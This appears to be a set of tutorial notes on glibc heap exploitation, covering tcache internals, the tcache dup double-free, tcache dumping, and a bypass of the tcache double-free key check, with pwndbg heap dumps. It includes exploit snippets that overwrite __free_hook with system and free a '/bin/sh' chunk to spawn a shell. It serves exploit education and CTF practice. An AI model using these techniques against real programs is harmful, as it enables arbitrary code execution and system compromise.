0x13b250f0 0x0000000000000000 0x0000000000000000 ................
0x13b25100 0x0000000000000000 0x0000000000000000 ................
0x13b25110 0x0000000000000000 0x0000000000000000 ................
0x13b25120 0x0000000000000000 0x0000000000020ee1 ................
0x13b25130 0x0000000000000000 0x0000000000000000 ................
0x13b25140 0x0000000000000000 0x0000000000020ec1 ................ <-- Top chunk
python to get to this state:
# Request 2 normal chunks.
chunk_A = malloc(0x88, b"A"*8)
dangling_pointer = malloc(0x88, b"B"*8)
# Free them
free(chunk_A)
free(dangling_pointer)
chunk_B = malloc(0xa8, b"C"*8)
chunk_C = malloc(0x88, b"D"*8)
free(chunk_B)
chunk_E = malloc(0x88, b"E"*8)
free (chunk_E)
// to be continued…
Tcache (libc 2.27 and later)
Thread cache. Weirdly, makes it easier to exploit by bypassing exploit mitigations.
heap arena is inline in the heap memory.
size = 0x251
counts = [1 ,1, …]
entries = [0x20, 0x10, … , 0x410]
Entries are address to the USER DATA
rather than the Metadata
.
Counts, running track of the amount of chunks. Single byte. 2.30 and later it’s 2 bytes.
New entries inserted at the head of the entries
(LIFO).
[ ENTRIES ] => [CHUNK A (USERDATA)] => 0x00
// FREE CHUNK B
[ ENTRIES ] => [CHUNK B (USERDATA)] => [CHUNK A (USERDATA)] => 0x00
Takeaways
- tcache has minitures arena
- Acts exactly like fastbins
- Tale precedence over regular arena.
Tcache Dup
The tcache dup technique is similar to the fastbin duplication method, allowing you to perform a double free with no immediate crashes or aborts. This is a great way to exploit heap management systems without triggering typical mitigation mechanisms.
In this example, we can see how chunks are freed and subsequently allocated in the tcache. With tcachebins[]
showing duplicate entries for the same block, we’re able to exploit this behavior by performing a double free without triggering a crash. The block is freed multiple times, but the heap manager doesn’t handle it as a typical double free.
0x603000 0x0000000000000000 0x0000000000000251 ........Q.......
0x603010 0x0000000000000003 0x0000000000000000 ................
0x603020 0x0000000000000000 0x0000000000000000 ................
0x603030 0x0000000000000000 0x0000000000000000 ................
0x603040 0x0000000000000000 0x0000000000000000 ................
0x603050 0x0000000000603260 0x0000000000000000 `2`.............
0x603060 0x0000000000000000 0x0000000000000000 ................
[ ... ]
0x603240 0x0000000000000000 0x0000000000000000 ................
0x603250 0x0000000000000000 0x0000000000000021 ........!.......
0x603260 0x0000000000603280 0x0000000000000000 .2`............. <-- tcachebins[0x20][0/3], tcachebins[0x20][0/3]
0x603270 0x0000000000000000 0x0000000000000021 ........!.......
0x603280 0x0000000000603260 0x0000000000000000 `2`............. <-- tcachebins[0x20][1/3]
0x603290 0x0000000000000000 0x0000000000020d71 ........q....... <-- Top chunk
Another approach is to double-free the same block without worrying about triggering the usual double-free checks.
0x603000 0x0000000000000000 0x0000000000000251 ........Q.......
0x603010 0x0000000000000002 0x0000000000000000 ................
0x603020 0x0000000000000000 0x0000000000000000 ................
0x603030 0x0000000000000000 0x0000000000000000 ................
0x603040 0x0000000000000000 0x0000000000000000 ................
0x603050 0x0000000000603260 0x0000000000000000 `2`.............
[ ... ]
0x603250 0x0000000000000000 0x0000000000000021 ........!.......
0x603260 0x0000000000603260 0x0000000000000000 `2`............. <-- tcachebins[0x20][0/2], tcachebins[0x20][0/2]
0x603270 0x0000000000000000 0x0000000000020d91 ................ <-- Top chunk
Now that we understand the behavior of the tcache, we can exploit it to manipulate memory. Here’s an example in Python to demonstrate how we can overwrite critical data, such as function pointers or other sensitive information, using the tcache duplication technique.
# Request a minimum-sized chunk and write data into it.
chunk_A = malloc(24, b"A"*8)
# Free chunk A.
free(chunk_A)
free(chunk_A)
chunk_B = malloc(24, p64(elf.sym.target))
chunk_B = malloc(24, b"A"*8) # Link fake chunk
write = malloc(24, b"pwned!\0") # Overwrite the target data with fake chunk
Code Execution
As usual, just overwrite a hook.
# Request a minimum-sized chunk and write data into it.
chunk_A = malloc(24, b"A"*8)
# Free chunk A.
free(chunk_A)
free(chunk_A)
malloc(24, p64(libc.sym.__free_hook))
binsh = malloc(24, b"/bin/sh\0"*8) # Link fake chunk
malloc(24, p64(libc.sym.system)) # Overwrite the target data
free(chunk_A)
io.interactive()
Takeaways
- Incredibly Simple: This technique is remarkably easy to execute and bypasses almost all mitigations.
- No Double-Free Mitigation: The system does not properly handle double-free vulnerabilities.
- No Size Field Check: There is no check for the size field, making it easier to manipulate memory.
- Count Field: The count field isn’t used to track available chunks, further simplifying exploitation.
Tcache Dumping (libc 2.31)
Tcache Dumping is essentially when tcache is full, the allocated chunks go to fastbin/unsortedbins. As you start free’ing these bins it will take from the tcache then the unsortedbins/fastbins. If you have room in the tcache, and do an allocation chunks will dump into the tcache instead of staying in the unsorted bins/ fastbins, until the tcache is full again.
Allocating 15 chunks of the same size, can result in half of them being allocated in tcachebins
and the oother fastbins
.
0x602000 0x0000000000000000 0x0000000000000291 ................
0x602010 0x0000000000000007 0x0000000000000000 ................
0x602020 0x0000000000000000 0x0000000000000000 ................
0x602030 0x0000000000000000 0x0000000000000000 ................
0x602040 0x0000000000000000 0x0000000000000000 ................
0x602050 0x0000000000000000 0x0000000000000000 ................
0x602060 0x0000000000000000 0x0000000000000000 ................
0x602070 0x0000000000000000 0x0000000000000000 ................
0x602080 0x0000000000000000 0x0000000000000000 ................
0x602090 0x0000000000602360 0x0000000000000000 `#`.............
[ ... ]
0x602290 0x0000000000000000 0x0000000000000021 ........!.......
0x6022a0 0x0000000000000000 0x0000000000602010 ......... `..... <-- tcachebins[0x20][6/7]
0x6022b0 0x0000000000000000 0x0000000000000021 ........!.......
0x6022c0 0x00000000006022a0 0x0000000000602010 ."`...... `..... <-- tcachebins[0x20][5/7]
0x6022d0 0x0000000000000000 0x0000000000000021 ........!.......
0x6022e0 0x00000000006022c0 0x0000000000602010 ."`...... `..... <-- tcachebins[0x20][4/7]
0x6022f0 0x0000000000000000 0x0000000000000021 ........!.......
0x602300 0x00000000006022e0 0x0000000000602010 ."`...... `..... <-- tcachebins[0x20][3/7]
0x602310 0x0000000000000000 0x0000000000000021 ........!.......
0x602320 0x0000000000602300 0x0000000000602010 .#`...... `..... <-- tcachebins[0x20][2/7]
0x602330 0x0000000000000000 0x0000000000000021 ........!.......
0x602340 0x0000000000602320 0x0000000000602010 #`...... `..... <-- tcachebins[0x20][1/7]
0x602350 0x0000000000000000 0x0000000000000021 ........!.......
0x602360 0x0000000000602340 0x0000000000602010 @#`...... `..... <-- tcachebins[0x20][0/7]
0x602370 0x0000000000000000 0x0000000000000021 ........!....... <-- fastbins[0x20][6]
0x602380 0x0000000000000000 0x0000000000000000 ................
0x602390 0x0000000000000000 0x0000000000000021 ........!....... <-- fastbins[0x20][5]
0x6023a0 0x0000000000602370 0x0000000000000000 p#`.............
0x6023b0 0x0000000000000000 0x0000000000000021 ........!....... <-- fastbins[0x20][4]
0x6023c0 0x0000000000602390 0x0000000000000000 .#`.............
0x6023d0 0x0000000000000000 0x0000000000000021 ........!....... <-- fastbins[0x20][3]
0x6023e0 0x00000000006023b0 0x0000000000000000 .#`.............
0x6023f0 0x0000000000000000 0x0000000000000021 ........!....... <-- fastbins[0x20][2]
0x602400 0x00000000006023d0 0x0000000000000000 .#`.............
0x602410 0x0000000000000000 0x0000000000000021 ........!....... <-- fastbins[0x20][1]
0x602420 0x00000000006023f0 0x0000000000000000 .#`.............
0x602430 0x0000000000000000 0x0000000000000021 ........!....... <-- fastbins[0x20][0]
0x602440 0x0000000000602410 0x0000000000000000 .$`.............
0x602450 0x0000000000000000 0x0000000000020bb1 ................ <-- Top chunk
The max limit is 7 chunks, this information is held in the mp
struct.
mp_ struct at: 0x7ffff7bb5280
{
trim_threshold = 131072,
top_pad = 131072,
mmap_threshold = 131072,
arena_test = 8,
arena_max = 0,
n_mmaps = 0,
n_mmaps_max = 65536,
max_n_mmaps = 0,
no_dyn_threshold = 0,
mmapped_mem = 0,
max_mmapped_mem = 0,
sbrk_base = 0x602000,
tcache_bins = 64,
tcache_max_bytes = 1032,
tcache_count = 7, <--- Here
tcache_unsorted_limit = 0,
}
Fun fact, calloc
doesn’t allocate from tcache
.
Now to see it in actions;
pwndbg> bins
tcachebins
empty
fastbins
0x20: 0x602430 —▸ 0x602410 —▸ 0x6023f0 —▸ 0x6023d0 —▸ 0x6023b0 —▸ 0x602390 —▸ 0x602370 ◂— 0
*Allocation*
pwndbg> bins
tcachebins
0x20 [ 6]: 0x602380 —▸ 0x6023a0 —▸ 0x6023c0 —▸ 0x6023e0 —▸ 0x602400 —▸ 0x602420 ◂— 0
fastbins
empty
Practice (Bypassing Double-free mitigation)
What was the mitigation implemented?
/* This test succeeds on double free. However, we don't 100%
trust it (it also matches random payload data at a 1 in
2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting. */
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
what is e->key
?
[ ... ]
0x603290 0x0000000000000000 0x0000000000000021 ........!.......
0x6032a0 0x0000000000000000 0x0000000000603010 .........0`..... <-- tcachebins[0x20][1/2]
0x6032b0 0x0000000000000000 0x0000000000000021 ........!.......
0x6032c0 0x00000000006032a0 0x0000000000603010 .2`......0`..... <-- tcachebins[0x20][0/2]
0x6032d0 0x0000000000000000 0x0000000000020d31 ........1....... <-- Top chunk
We now have new values on free’d chunks, in the “bk”, field, but they both hold the address of the tchache and are the “key” fields.
Basically then, if a key
field points to tcache, then malloc hints it’s already free.
the main logic kicks off, and malloc iterates over every chunk to see if it’s already in the tcachebin, if it is, then malloc aborts.
This kills the fastbin dup.
How to get around this??
Step-by-Step Exploitation
- Free the chunk once (Fastbin) – The first free operation places the chunk into the fastbin.
- Move a fake chunk from Fastbin to tcache – This sets up a controlled chunk in the tcache list.
- Fill the tcache – Ensuring that tcache is full prevents immediate allocations from interfering with our setup.
- Free the duplicate chunk to Fastbin again – This places the chunk into the fastbin a second time.
- Empty the tcache – Preparing for the next allocation cycle.
- Free the duplicate chunk again (Now goes into tcache) – Since the tcache key field isn’t populated yet, we bypass the mitigation.
- The chunk is now present in both Fastbin and tcache – This is the key step that enables us to manipulate allocations.
- Allocate the chunk from tcache first – This allows overwriting the tcache key data.
- Allocate the chunk again from Fastbin – This forces tcache dumping, ensuring the chunk is reused.
- Move the chunk from Fastbin to tcache – The chunk is now placed back into tcache, keeping the heap in a vulnerable state.
- Allocate the chunk again from tcache and overwrite target data – Achieving arbitrary memory overwrite
# Request 7 0x20-sized chunks.
for n in range(7):
malloc(24, b"Filler")
dup = malloc(24, "Y"* 8)
# Fill the 0x20 tcachebin.
for n in range(7):
free(n)
free (dup)
for n in range(7):
malloc(24, b"Filler")
free (dup)
# chunk is in both tcache and fastbin
# Allocation will cause dup to move to tcache
malloc (24 , p64(libc.sym.system - 0x18))
malloc (24 , b"Y"*8)
malloc (24 , b"b"*8 + b"Pwned!\0")
io.interactive()
Code Execution
- Change the target.
# Request 7 0x20-sized chunks.
for n in range(7):
malloc(24, b"Filler")
dup = malloc(24, "Y"* 8)
# Fill the 0x20 tcachebin.
for n in range(7):
free(n)
free (dup)
for n in range(7):
malloc(24, b"Filler")
free (dup)
# chunk is in both tcache and fastbin
# Allocation will cause dup to move t
malloc (24 , p64(libc.sym.__free_hook - 16))
binsh = malloc (24 , b"/bin/sh\0")
malloc (24 , p64(libc.sym.system))
free (binsh)
io.interactive()
Side Notes!
mallocopt
can be used to control malloc internals. Malloc_MMAP_Threshold_
only take effect once malloc
has been initialized.
GLIBC_tunables
, to view p tunable_list[21]
can be used. Important, tcache_count
@ 21.